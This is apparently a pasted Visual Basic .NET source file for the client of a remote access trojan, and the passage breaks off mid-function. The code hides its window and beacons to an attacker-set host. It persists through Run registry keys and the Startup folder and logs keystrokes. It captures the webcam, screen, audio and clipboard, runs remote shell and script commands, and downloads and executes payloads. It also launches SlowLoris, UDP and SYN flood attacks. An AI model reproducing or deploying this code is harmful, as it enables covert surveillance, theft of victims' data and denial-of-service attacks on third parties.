· 6 years ago · Jan 01, 2020, 09:20 PM
1Imports System.Windows
2Imports System
3Imports System.Windows.Forms
4Imports System.Windows.Forms.Form
5Imports Microsoft.VisualBasic
6Imports System.Reflection
7Imports System.Net
8Imports System.Net.Sockets
9Imports System.Threading
10Imports System.IO
11Imports System.Runtime.InteropServices
12Imports System.Management
13Imports System.Text.RegularExpressions
14Imports System.Text
15Imports Microsoft.Win32
16Imports System.Net.NetworkInformation
17Imports System.Drawing
18Imports System.ServiceProcess
19
20Public Class EntryPoint
21 Public Shared Sub Main(args As [String]())
22 Dim FrmMain As New Form1
23 FrmMain.Size = New Size(0, 0)
24 FrmMain.ShowInTaskbar = False
25 FrmMain.Visible = False
26 FrmMain.Opacity = 0
27 Application.Run(FrmMain)
28 End Sub
29 End Class
30
31 Public Class Form1
32 Inherits Form
33 Dim client As TcpClient
34 Dim Connection As Thread
35 Dim enckey As String = "kT6ymNlgrm"
36 Dim screensending As Thread
37 Dim comp As Long
38 Dim res As String
39 Private Declare Function SetCursorPos Lib "user32" (ByVal X As Integer, ByVal Y As Integer) As Integer
40 Public Declare Sub mouse_event Lib "user32" Alias "mouse_event" (ByVal dwFlags As Integer, ByVal dx As Integer, ByVal dy As Integer, ByVal cButtons As Integer, ByVal dwExtraInfo As Integer)
41 Private Const MOUSEEVENTF_LEFTDOWN As Object = &H2
42 Private Const MOUSEEVENTF_LEFTUP As Object = &H4
43 Private Const MOUSEEVENTF_RIGHTDOWN As Object = &H8
44 Private Const MOUSEEVENTF_RIGHTUP As Object = &H10
45 Dim sl As New SlowLoris
46 Private Declare Function GetForegroundWindow Lib "user32.dll" () As Int32
47 Private Declare Function GetWindowText Lib "user32.dll" Alias "GetWindowTextA" (ByVal hwnd As Int32, ByVal lpString As String, ByVal cch As Int32) As Int32
48 Dim WithEvents logger As New Keylogger
49 Dim logs As String
50 Dim strin As String
51 Dim curntdir2 As String
52 Dim listviewfiles As New ListView
53 Dim tbmessage As New TextBox
54 Dim rtblogs As New RichTextBox
55 Dim chat As New Form
56 Dim discomousing As Thread
57
58#Region "API Declerations"
59 Private Declare Function SystemParametersInfo Lib "user32" Alias "SystemParametersInfoA" (ByVal uAction As Integer, ByVal uParam As Integer, ByVal lpvParam As String, ByVal fuWinIni As Integer) As Integer
60 Private Const SETDESKWALLPAPER As Integer = 20
61 Private Const UPDATEINIFILE As Long = &H1
62 Declare Function GetDesktopWindow Lib "user32" () As Long
63 Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Integer) As Long
64 Public Const WM_SYSCOMMAND As Long = &H112&
65 Public Const SC_SCREENSAVE As Long = &HF140&
66 Private Declare Function SwapMouseButton& Lib "user32" (ByVal bSwap As Long)
67 Private Declare Function SystemParametersInfo Lib "user32" Alias "SystemParametersInfoA" (ByVal uAction As Long, ByVal uParam As Integer, ByVal lpvParam As Long, ByVal fuWinIni As Long) As Long
68 Declare Function mciSend Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpszCommand As String, ByVal lpszReturnString As String, ByVal cchReturnLength As Long, ByVal hwndCallback As Long) As Long
69 Private Declare Function FindWindow Lib "user32.dll" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Int32
70 Private Declare Function ShowWindow Lib "user32.dll" (ByVal hwnd As IntPtr, ByVal nCmdShow As Int32) As Int32
71 Private Const SW_HIDE As Int32 = 0
72 Private Const SW_RESTORE As Int32 = 9
73 Private Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long
74 Private Const SWP_HIDEWINDOW As Long = &H80
75 Private Const SWP_SHOWWINDOW As Long = &H40
76 <DllImport("ntdll.dll", SetLastError:=True, CharSet:=CharSet.Auto)>
77 Public Shared Sub RtlSetProcessIsCritical(ByVal bValue As Boolean, ByRef bVal2 As Boolean, ByVal bVal3 As Boolean)
78 End Sub
79 <DllImport("winmm.dll")>
80 Private Shared Function mciSendString(ByVal command As String, ByVal buffer As StringBuilder, ByVal bufferSize As Integer, ByVal hwndCallback As IntPtr) As Integer
81 End Function
82#End Region
83#Region "Webcam Declerations"
84 Dim picCapture As New PictureBox
85 Const WM_CAP As Short = &H400S
86 Const WM_CAP_DRIVER_CONNECT As Integer = WM_CAP + 10
87 Const WM_CAP_DRIVER_DISCONNECT As Integer = WM_CAP + 11
88 Const WM_CAP_EDIT_COPY As Integer = WM_CAP + 30
89 Const WM_CAP_SET_PREVIEW As Integer = WM_CAP + 50
90 Const WM_CAP_SET_PREVIEWRATE As Integer = WM_CAP + 52
91 Const WM_CAP_SET_SCALE As Integer = WM_CAP + 53
92 Const WS_CHILD As Integer = &H40000000
93 Const WS_VISIBLE As Integer = &H10000000
94 Const SWP_NOMOVE As Short = &H2S
95 Const SWP_NOSIZE As Short = 1
96 Const SWP_NOZORDER As Short = &H4S
97 Const HWND_BOTTOM As Short = 1
98 Dim iDevice As Integer = 0
99 Dim hHwnd As Integer
100 Declare Function SendWebcam Lib "user32" Alias "SendMessageA" (ByVal hwnd As Integer, ByVal wMsg As Integer, ByVal wParam As Integer, ByVal lParam As Object) As Integer
101 Declare Function SetWebcamPos Lib "user32" Alias "SetWindowPos" (ByVal hwnd As Integer, ByVal hWndInsertAfter As Integer, ByVal x As Integer, ByVal y As Integer, ByVal cx As Integer, ByVal cy As Integer, ByVal wFlags As Integer) As Integer
102 Declare Function DestroyWebcam Lib "user32" (ByVal hndw As Integer) As Boolean
103 Declare Function capCreateCaptureWindowA Lib "avicap32.dll" (ByVal lpszWindowName As String, ByVal dwStyle As Integer, ByVal x As Integer, ByVal y As Integer, ByVal nWidth As Integer, ByVal nHeight As Short, ByVal hWndParent As Integer, ByVal nID As Integer) As Integer
104 Declare Function capGetDriverDescriptionA Lib "avicap32.dll" (ByVal wDriver As Short, ByVal lpszName As String, ByVal cbName As Integer, ByVal lpszVer As String, ByVal cbVer As Integer) As Boolean
105 Dim webcamsending As Thread
106#End Region
107#Region "Builder Parameters and Keylogger Hook"
108 Dim installenable, dropinsubfolder, startupenable, startupdir, startupuser, startuplocal, regpersistence, melt, delay, criticalProcess, processPersistance, hideProcess, runPEinjection, protectProcess, systemAttribute, hiddenAttribute As Boolean
109 Dim dropsubfoldername, dropname, path, runPEinjectionTarget As String
110 Dim delaytime As Integer
111 Dim WithEvents reg As New RegistryWatcher
112 Dim objMutex As Mutex
113 Sub New()
114 logger.CreateHook()
115 End Sub
116#End Region
117#Region "Connection"
118 Sub Connect()
119TryAgain:
120 Try
121 client = New TcpClient("%HOST%", 1550551)
122 Send(AES_Encrypt("NewConnection|" & GetInfo() & "|" & SystemInformation.UserName.ToString() & "|" & SystemInformation.ComputerName.ToString() & "|" & My.Computer.Info.OSFullName & "|" & My.Computer.Info.OSVersion & "|" & getpriv(), enckey))
123 client.GetStream().BeginRead(New Byte() {0}, 0, 0, AddressOf Read, Nothing)
124 Catch ex As Exception
125 GoTo TryAgain
126 End Try
127 End Sub
128 Sub Read(ByVal ar As IAsyncResult)
129 Dim message As String
130 Try
131 Dim reader As New StreamReader(client.GetStream())
132 message = reader.ReadLine()
133 message = AES_Decrypt(message, enckey)
134 parse(message)
135 client.GetStream().BeginRead(New Byte() {0}, 0, 0, AddressOf Read, Nothing)
136 Catch ex As Exception
137 Thread.Sleep(4000)
138 Connect()
139 End Try
140 End Sub
141 Public Sub Send(ByVal message As String)
142 Try
143 Dim writer As New StreamWriter(client.GetStream())
144 writer.WriteLine(message)
145 writer.Flush()
146 Catch
147 End Try
148 End Sub
149 Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
150 Try
151 objMutex = New Mutex(False, "%MUTEX%")
152 If objMutex.WaitOne(0, False) = False Then
153 objMutex.Close()
154 objMutex = Nothing
155 Application.ExitThread()
156 End
157 End If
158
159 installenable = "%INSTALL%"
160 dropinsubfolder = "%FILENAME%"
161 dropsubfoldername = "%SUBFOLDER%"
162 startupenable = "%STARTUP%"
163 startupdir = "%STARTUPDIR%"
164 startupuser = "%STARTUPUSER%"
165 startuplocal = "%STARTUPLOCAL%"
166 regpersistence = "%REGPERSISTANCE%"
167 melt = "%MELT%"
168 delay = "%DELAY%"
169 dropname = "%EXENAME%"
170
171 path = "%PATH%"
172 delaytime = "%DELAYTIME%"
173 criticalProcess = "%CRITICALPROCESS%"
174 processPersistance = "%PROCESSPERSISTANCE%"
175 hideProcess = "%HIDEPROCESS%"
176 protectProcess = "%PROCTECTPROCESS%"
177 runPEinjection = "%RUNPEINJECTION%"
178 runPEinjectionTarget = "%RUNPEINJECTIONTARGET%"
179 hiddenAttribute = "%HIDDENATTRIBUTE%"
180 systemAttribute = "%SYSTEMATTRIBUTE%"
181
182 If delay = True Then
183 Thread.Sleep(delaytime)
184 End If
185
186 If Application.ExecutablePath.Contains("Temp") Or Application.ExecutablePath.Contains("AppData") Or Application.ExecutablePath.Contains("Program") Then
187 GoTo 1
188 End If
189
190 If installenable = True Then
191 If dropinsubfolder = True Then
192 If Not My.Computer.FileSystem.DirectoryExists(getPath(path) & "\" & dropsubfoldername) Then
193 My.Computer.FileSystem.CreateDirectory(getPath(path) & "\" & dropsubfoldername)
194 End If
195 IO.File.WriteAllBytes(getPath(path) & "\" & dropsubfoldername & "\" & dropname, IO.File.ReadAllBytes(Application.ExecutablePath))
196 domelt(getPath(path) & "\" & dropsubfoldername & "\" & dropname)
197 Exit Sub
198 Else
199 IO.File.WriteAllBytes(getPath(path) & "\" & dropname, IO.File.ReadAllBytes(Application.ExecutablePath))
200 domelt(getPath(path) & "\" & dropname)
201 Exit Sub
202 End If
203 End If
204
2051: If startupenable = True Then
206 If startupdir = True Then
207 Dim nam As String = New IO.FileInfo(Application.ExecutablePath).Name
208 File.WriteAllBytes(Environment.GetFolderPath(Environment.SpecialFolder.Startup).ToString & "\" & nam, IO.File.ReadAllBytes(Application.ExecutablePath))
209 ElseIf startupuser = True Then
210 Dim regkey As RegistryKey
211 regkey = Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True)
212 regkey.SetValue(New IO.FileInfo(Application.ExecutablePath).Name.Replace(".exe", ""), Chr(34) & Application.ExecutablePath & Chr(34))
213 ElseIf startuplocal = True Then
214 If My.User.IsInRole(ApplicationServices.BuiltInRole.Administrator) Then
215 Dim regkey As RegistryKey
216 regkey = Registry.LocalMachine.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True)
217 regkey.SetValue(New IO.FileInfo(Application.ExecutablePath).Name.Replace(".exe", ""), Chr(34) & Application.ExecutablePath & Chr(34))
218 If regpersistence = True Then
219 reg.AddWatcher(RegistryWatcher.HKEY_ROOTS.HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Run", New IO.FileInfo(Application.ExecutablePath).Name.Replace(".exe", ""))
220 End If
221 Else
222 Dim regkey As RegistryKey
223 regkey = Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True)
224 regkey.SetValue(New IO.FileInfo(Application.ExecutablePath).Name.Replace(".exe", ""), Chr(34) & Application.ExecutablePath & Chr(34))
225 End If
226 End If
227 End If
228
229 If systemAttribute = True Then
230 SetAttr(Application.ExecutablePath, FileAttribute.System)
231 End If
232 If hiddenAttribute = True Then
233 SetAttr(Application.ExecutablePath, FileAttribute.Hidden)
234 End If
235
236 If criticalprocess = True Then
237 System.Diagnostics.Process.EnterDebugMode()
238 RtlSetProcessIsCritical(True, False, False)
239 System.Diagnostics.Process.LeaveDebugMode()
240 End If
241
242 Connection = New Thread(AddressOf Connect)
243 Connection.Start()
244
245 Catch
246 End Try
247 End Sub
248#End Region
249#Region "Function Callers"
250 Sub parse(ByVal msg As String)
251 Try
252 If msg = "Disconnected" Then
253 Connection.Abort()
254 Connection = New Thread(AddressOf Connect)
255 Connection.Start()
256 If criticalprocess = True Then
257 System.Diagnostics.Process.EnterDebugMode()
258 RtlSetProcessIsCritical(False, False, False)
259 System.Diagnostics.Process.LeaveDebugMode()
260 End If
261 ElseIf msg = "SystemInformation" Then
262 Send(AES_Encrypt("SystemInformation|" & getsystem() & GetDeepInfo(), enckey))
263 ElseIf msg = "GetProcess" Then
264 sendprocess()
265 ElseIf msg.StartsWith("Kill") Then
266 KillProcesses(msg)
267 ElseIf msg.StartsWith("New") Then
268 System.Diagnostics.Process.Start(msg.Split("|")(1))
269 ElseIf msg = "Software" Then
270 getinstalledsoftware()
271 ElseIf msg.StartsWith("RD") Then
272 comp = msg.Split("|")(1)
273 res = msg.Split("|")(2)
274 screensending = New Thread(AddressOf sendscreen)
275 screensending.Start()
276 ElseIf msg = "Stop" Then
277 screensending.Abort()
278 ElseIf msg = "GetPcBounds" Then
279 Send(AES_Encrypt("PCBounds" & My.Computer.Screen.Bounds.Height & "x" & My.Computer.Screen.Bounds.Width, enckey))
280 ElseIf msg.Contains("SetCurPos") Then
281 MouseMov(msg)
282 ElseIf msg.StartsWith("OpenWebsite") Then
283 openwebsite(msg.Replace("OpenWebsite", ""))
284 ElseIf msg.StartsWith("DandE") Then
285 dande(msg.Replace("DandE", ""))
286 ElseIf msg.StartsWith("MSG") Then
287 MessageBox.Show(GetBetween(msg, "Body: ", " Icon:", 0), GetBetween(msg, "Title: ", " Body:", 0), MessageBoxButton(GetBetween(msg, "Button: ", " End", 0)), MessageBoxIcn(GetBetween(msg, "Icon: ", " Button:", 0)))
288 ElseIf msg = "GetHostsFile" Then
289 loadhostsfile()
290 ElseIf msg.StartsWith("SaveHostsFile") Then
291 savehostsfile(msg.Replace("SaveHostsFile", ""))
292 ElseIf msg = "GetCPImage" Then
293 getclipboardimage()
294 ElseIf msg = "GetCPText" Then
295 getclipboardtext()
296 ElseIf msg.StartsWith("SaveCPText") Then
297 setclipboardtext(msg.Replace("SaveCPText", ""))
298 ElseIf msg.StartsWith("Shell") Then
299 runshell(msg.Replace("Shell", ""))
300 ElseIf msg = "GetKeyLogs" Then
301 Send(AES_Encrypt("KeyLogs" & logs, enckey))
302 ElseIf msg = "DelKeyLogs" Then
303 logs = ""
304 ElseIf msg = "RecordingStart" Then
305 audio_start()
306 ElseIf msg = "RecordingStop" Then
307 audio_stop()
308 ElseIf msg = "RecordingDownload" Then
309 audio_get()
310 ElseIf msg = "GetTCPConnections" Then
311 Send(AES_Encrypt("TCPConnections" & GetTCPConnections(), enckey))
312 ElseIf msg.StartsWith("GetStartup") Then
313 GetStartupEntries()
314 ElseIf msg.StartsWith("UpdateFromLink") Then
315 UpdatefromLink(msg.Replace("UpdateFromLink", ""))
316 ElseIf msg.StartsWith("UpdatefromFile") Then
317 UpdateFromFile(msg.Replace("UpdatefromFile", ""))
318 ElseIf msg.StartsWith("ExecuteFromLink") Then
319 ExecutefromLink(msg.Replace("ExecuteFromLink", ""))
320 ElseIf msg.StartsWith("ExecutefromFile") Then
321 ExecutefromFile(msg.Replace("ExecutefromFile", ""))
322 ElseIf msg = "Restart" Then
323 rstart()
324 ElseIf msg = "Uninstall" Then
325 delete(3)
326 ElseIf msg.StartsWith("RemovefromStartup") Then
327 removefromstartup(msg.Replace("RemovefromStartup", ""))
328 ElseIf msg = "ListDrives" Then
329 listdrives()
330 ElseIf msg.StartsWith("ListFiles") Then
331 showfiles(msg.Replace("ListFiles", ""))
332 ElseIf msg.Contains("mkdir") Then
333 createnewdirectory(msg.Replace("mkdir", ""))
334 ElseIf msg.Contains("rmdir") Then
335 deletedirectory(msg.Replace("rmdir", ""))
336 ElseIf msg.Contains("rnfolder") Then
337 renamedirectory(msg.Replace("rnfolder", "").Split("|")(0), msg.Replace("rnfolder", "").Split("|")(1))
338 ElseIf msg.Contains("mvdir") Then
339 movedirectory(msg.Replace("mvdir", "").Split("|")(0), msg.Replace("mvdir", "").Split("|")(1), msg.Replace("mvdir", "").Split("|")(2))
340 ElseIf msg.Contains("cpdir") Then
341 copydirectory(msg.Replace("cpdir", "").Split("|")(0), msg.Replace("cpdir", "").Split("|")(1), msg.Replace("cpdir", "").Split("|")(2))
342 ElseIf msg.Contains("mkfile") Then
343 CreateNewFile(msg)
344 ElseIf msg.Contains("rmfile") Then
345 deletefile(msg.Replace("rmfile", "").Split("|")(0))
346 ElseIf msg.Contains("rnfile") Then
347 renamefile(msg.Replace("rnfile", "").Split("|")(0), msg.Replace("rnfile", "").Split("|")(1))
348 ElseIf msg.Contains("movefile") Then
349 movefile(msg.Replace("movefile", "").Split("|")(0), msg.Replace("movefile", "").Split("|")(1), msg.Replace("move", "").Split("|")(2))
350 ElseIf msg.Contains("copyfile") Then
351 copyfile(msg.Replace("copyfile", "").Split("|")(0), msg.Replace("copyfile", "").Split("|")(1), msg.Replace("copyfile", "").Split("|")(2))
352 ElseIf msg.StartsWith("sharefile") Then
353 sharefile(msg.Replace("sharefile", ""))
354 ElseIf msg.StartsWith("FileUpload") Then
355 UploadFile(msg.Replace("FileUpload", ""))
356 ElseIf msg = "ListWebcamDevices" Then
357 listdevices()
358 ElseIf msg = "WebcamStart" Then
359 webcamsending = New Thread(AddressOf getwebcam)
360 webcamsending.Start()
361 ElseIf msg.StartsWith("SlowLorisStart") Then
362 StartSlowLoris(msg.Replace("SlowLorisStart", ""))
363 ElseIf msg.StartsWith("SlowLorisStop") Then
364 sl.StopFlood()
365 ElseIf msg.StartsWith("UDPStart") Then
366 StartUDP(msg.Replace("UDPStart", ""))
367 ElseIf msg = "UDPStop" Then
368 If UDPFlood.FloodRunning = True Then
369 UDPFlood.StopUDPFlood()
370 End If
371 ElseIf msg.StartsWith("SYNStart") Then
372 StartSYN(msg.Replace("SYNStart", ""))
373 ElseIf msg = "SYNStop" Then
374 If SynFlood.IsRunning = True Then
375 SynFlood.StopSynFlood()
376 End If
377 ElseIf msg.StartsWith("HTMLScripting") Then
378 IO.File.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\FBqINhRdpgnqATxJ.html", msg.Replace("HTMLScripting", ""))
379 System.Diagnostics.Process.Start(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\FBqINhRdpgnqATxJ.html")
380 ElseIf msg.StartsWith("VBSScripting") Then
381 IO.File.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\UjfAPUFPaUkAqQTZ.vbs", msg.Replace("VBSScripting", ""))
382 System.Diagnostics.Process.Start(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\UjfAPUFPaUkAqQTZ.vbs")
383 ElseIf msg.StartsWith("BATScripting") Then
384 IO.File.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\X53DNwMsMwjtC9JW.bat", msg.Replace("BATScripting", ""))
385 System.Diagnostics.Process.Start(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\X53DNwMsMwjtC9JW.bat")
386 ElseIf msg.StartsWith("GetThumbNails") Then
387 SendThumbNail()
388 ElseIf msg.Contains("Website") Then
389 openwebsite(msg.Split("|")(1))
390 ElseIf msg.Contains("logoff") Then
391 Shell("shutdown /l")
392 ElseIf msg.Contains("shutdwn") Then
393 Shell("shutdown /s")
394 ElseIf msg.Contains("restrt") Then
395 Shell("shutdown /r")
396 ElseIf msg.Contains("Change") Then
397 My.Computer.Network.DownloadFile(msg.Split("|")(0), My.Computer.FileSystem.SpecialDirectories.Temp.ToString & "\wallpaper.jpg")
398 SystemParametersInfo(SETDESKWALLPAPER, 0, My.Computer.FileSystem.SpecialDirectories.Temp.ToString & "\wallpaper.jpg", UPDATEINIFILE)
399 ElseIf msg.Contains("Spk") Then
400 Dim SAPI As Object
401 SAPI = CreateObject("SAPI.spvoice")
402 SAPI.Speak(msg.Split("|")(1).ToString)
403 ElseIf msg.Contains("UndoMouse") Then
404 SwapMouseButton(False)
405 ElseIf msg.Contains("SwapMouse") Then
406 SwapMouseButton(True)
407 ElseIf msg = "CloseCD" Then
408 mciSend("set CDAudio door closed", 0, 0, 0)
409 ElseIf msg = "OpenCD" Then
410 mciSend("set CDAudio door open", 0, 0, 0)
411 ElseIf msg.Contains("ShowIcons") Then
412 Dim hWnd As IntPtr
413 hWnd = FindWindow(vbNullString, "Program Manager")
414 If Not hWnd = 0 Then
415 ShowWindow(hWnd, SW_RESTORE)
416 End If
417 ElseIf msg.Contains("HideIcons") Then
418 Dim hWnd As IntPtr
419 hWnd = FindWindow(vbNullString, "Program Manager")
420 If Not hWnd = 0 Then
421 ShowWindow(hWnd, SW_HIDE)
422 End If
423 ElseIf msg.Contains("ShowTaskbar") Then
424 ShowTaskBar()
425 ElseIf msg.Contains("HideTaskbar") Then
426 HideTaskBar()
427 ElseIf msg = "StartDiscoMouse" Then
428 discomousing = New Thread(AddressOf discomouse)
429 discomousing.Start()
430 ElseIf msg = "StopDiscoMouse" Then
431 discomousing.Abort()
432 ElseIf msg = "WebcamStop" Then
433 webcamsending.Abort()
434 ElseIf msg = "GetServices" Then
435 SendServices()
436 ElseIf msg.StartsWith("ServiceAction") Then
437 Dim res As String = msg.Replace("ServiceAction", "")
438 PerformServiceAction(res.Split("|")(0), res.Split("|")(1))
439 End If
440 Catch
441 End Try
442 End Sub
443#End Region
444#Region "Other Variables"
445 Function getPath(ByVal input As String) As String
446 Select Case input
447 Case "Appdata Local"
448 Return Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData).ToString()
449 Case "Appdata Roaming"
450 Return Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData).ToString()
451 Case "Temp"
452 Return My.Computer.FileSystem.SpecialDirectories.Temp.ToString()
453 Case "Program Files"
454 Return Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles).ToString()
455 Case "Programs"
456 Return Environment.GetFolderPath(Environment.SpecialFolder.Programs).ToString()
457 Case "Program Data"
458 Return Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData).ToString()
459 Case Else : Return Nothing
460 End Select
461 End Function
462 Sub domelt(ByVal path As String)
463 Try
464 Dim p As New System.Diagnostics.ProcessStartInfo("cmd.exe")
465 p.Arguments = "/C ping 1.1.1.1 -n 1 -w " & 3 & " > Nul & Del " & ControlChars.Quote & Application.ExecutablePath & ControlChars.Quote & "&" & ControlChars.Quote & path & ControlChars.Quote
466 p.CreateNoWindow = True
467 p.ErrorDialog = False
468 p.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
469 System.Diagnostics.Process.Start(p)
470 Application.Exit()
471 Catch
472 End Try
473 End Sub
474 Private Sub reg_RegistryChanged(M As RegistryWatcher.Monitor) Handles reg.RegistryChanged
475 Try
476 Dim regkey As RegistryKey
477 regkey = Registry.LocalMachine.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True)
478 regkey.SetValue(New IO.FileInfo(Application.ExecutablePath).Name.Replace(".exe", ""), Chr(34) & Application.ExecutablePath & Chr(34))
479 Catch
480 End Try
481 End Sub
482#End Region
483#Region "Others"
484 Sub discomouse()
485 Try
486 Do
487 Dim mousepos As New System.Drawing.Point
488 mousepos.X = New Random().Next(0, My.Computer.Screen.Bounds.Height)
489 mousepos.Y = New Random().Next(0, My.Computer.Screen.Bounds.Width)
490 System.Windows.Forms.Cursor.Position = mousepos
491 Loop
492 Catch
493 End Try
494 End Sub
495 Sub KillProcesses(ByVal txt As String)
496 Try
497 txt = txt.Replace("Kill|", "")
498
499 For i As Integer = 0 To CountCharacter(txt, "|")
500 System.Diagnostics.Process.GetProcessesByName(txt.Split("|")(i).Remove(txt.Split("|")(i).Length - 4, 4))(0).CloseMainWindow()
501 Next
502 Catch
503 End Try
504 End Sub
505 Public Function CountCharacter(ByVal value As String, ByVal ch As Char) As Integer
506 Try
507 Dim cnt As Integer = 0
508 For Each c As Char In value
509 If c = ch Then cnt += 1
510 Next
511 Return cnt
512 Catch
513 Return Nothing
514 End Try
515 End Function
516 Sub openwebsite(ByVal url As String)
517 Try
518 System.Diagnostics.Process.Start(url)
519 Catch : End Try
520 End Sub
521 Sub dande(ByVal url As String)
522 Try
523 Dim web As New WebClient
524 web.DownloadFile(url, My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\file.exe")
525 Shell(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\file.exe")
526 Catch
527 End Try
528 End Sub
529 Private Function GetBetween(ByVal input As String, ByVal str1 As String, ByVal str2 As String, ByVal index As Integer) As String
530 Dim temp As String = Regex.Split(input, str1)(index + 1)
531 Return Regex.Split(temp, str2)(0)
532 End Function
533 Function MessageBoxButton(ByVal Text As String) As Object
534 Select Case Text
535 Case "AbortRetryIgnore"
536 Return MessageBoxButtons.AbortRetryIgnore
537 Case "OK"
538 Return MessageBoxButtons.OK
539 Case "OKCancel"
540 Return MessageBoxButtons.OKCancel
541 Case "RetryCancel"
542 Return MessageBoxButtons.RetryCancel
543 Case "YesNo"
544 Return MessageBoxButtons.YesNo
545 Case "YesNoCancel"
546 Return MessageBoxButtons.YesNoCancel
547 Case Else
548 Return MessageBoxButtons.OK
549 End Select
550 End Function
551 Function MessageBoxIcn(ByVal text As String) As Object
552 Select Case text
553 Case "Asterisk"
554 Return MessageBoxIcon.Asterisk
555 Case "Error"
556 Return MessageBoxIcon.Error
557 Case "Exclamation"
558 Return MessageBoxIcon.Exclamation
559 Case "Hand"
560 Return MessageBoxIcon.Hand
561 Case "Information"
562 Return MessageBoxIcon.Information
563 Case "None"
564 Return MessageBoxIcon.None
565 Case "Question"
566 Return MessageBoxIcon.Question
567 Case "Stop"
568 Return MessageBoxIcon.Stop
569 Case "Warning"
570 Return MessageBoxIcon.Warning
571 Case Else
572 Return MessageBoxIcon.None
573 End Select
574 End Function
575 Sub UpdatefromLink(ByVal url As String)
576 Try
577 My.Computer.Network.DownloadFile(url, My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\updated.exe")
578 Dim p As New System.Diagnostics.ProcessStartInfo("cmd.exe")
579 p.Arguments = "/C ping 1.1.1.1 -n 1 -w 5 > Nul & Del " & ControlChars.Quote & Application.ExecutablePath & ControlChars.Quote
580 p.CreateNoWindow = True
581 p.ErrorDialog = False
582 p.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
583
584 Dim pp As New System.Diagnostics.ProcessStartInfo("cmd.exe")
585 pp.Arguments = "/C ping 1.1.1.1 -n 1 -w 5 > Nul & " & ControlChars.Quote & My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\updated.exe" & ControlChars.Quote
586 pp.CreateNoWindow = True
587 pp.ErrorDialog = False
588 pp.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
589
590 System.Diagnostics.Process.Start(p)
591 System.Diagnostics.Process.Start(pp)
592
593 Application.Exit()
594 Catch
595 End Try
596 End Sub
597 Sub UpdateFromFile(ByVal txt As String)
598 Try
599 File.WriteAllBytes(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\updated.exe", Convert.FromBase64String(txt))
600 Dim p As New System.Diagnostics.ProcessStartInfo("cmd.exe")
601 p.Arguments = "/C ping 1.1.1.1 -n 1 -w 5 > Nul & Del " & ControlChars.Quote & Application.ExecutablePath & ControlChars.Quote
602 p.CreateNoWindow = True
603 p.ErrorDialog = False
604 p.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
605
606 Dim pp As New System.Diagnostics.ProcessStartInfo("cmd.exe")
607 pp.Arguments = "/C ping 1.1.1.1 -n 1 -w 5 > Nul & " & ControlChars.Quote & My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\updated.exe" & ControlChars.Quote
608 pp.CreateNoWindow = True
609 pp.ErrorDialog = False
610 pp.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
611
612 System.Diagnostics.Process.Start(p)
613 System.Diagnostics.Process.Start(pp)
614
615 Application.Exit()
616 Catch
617 End Try
618 End Sub
619 Sub ExecutefromLink(ByVal url As String)
620 Try
621 My.Computer.Network.DownloadFile(url, My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\exec.exe")
622 Shell(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\exec.exe")
623 Catch
624 End Try
625 End Sub
626 Sub ExecutefromFile(ByVal txt As String)
627 Try
628 File.WriteAllBytes(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\exec.exe", Convert.FromBase64String(txt))
629 Shell(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\exec.exe")
630 Catch
631 End Try
632 End Sub
633 Sub rstart()
634 Try
635 Dim p As New System.Diagnostics.ProcessStartInfo("cmd.exe")
636 p.Arguments = "/C ping 1.1.1.1 -n 1 -w 15 > Nul & " & ControlChars.Quote & Application.ExecutablePath & ControlChars.Quote
637 p.CreateNoWindow = True
638 p.ErrorDialog = False
639 p.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
640 System.Diagnostics.Process.Start(p)
641 Application.Exit()
642 Catch
643 End Try
644 End Sub
645 Sub delete(ByVal timeout As Integer)
646 Try
647 SetAttr(Application.ExecutablePath, FileAttribute.Normal)
648 Dim p As New System.Diagnostics.ProcessStartInfo("cmd.exe")
649 p.Arguments = "/C ping 1.1.1.1 -n 1 -w " & timeout & " > Nul & Del " & ControlChars.Quote & Application.ExecutablePath & ControlChars.Quote
650 p.CreateNoWindow = True
651 p.ErrorDialog = False
652 p.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
653
654 If startuplocal = True Then
655 Dim regkey As RegistryKey
656 regkey = Registry.LocalMachine.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True)
657 If regpersistence = True Then
658 reg.RemoveWatcher(New IO.FileInfo(Application.ExecutablePath).Name.Replace(".exe", ""))
659 End If
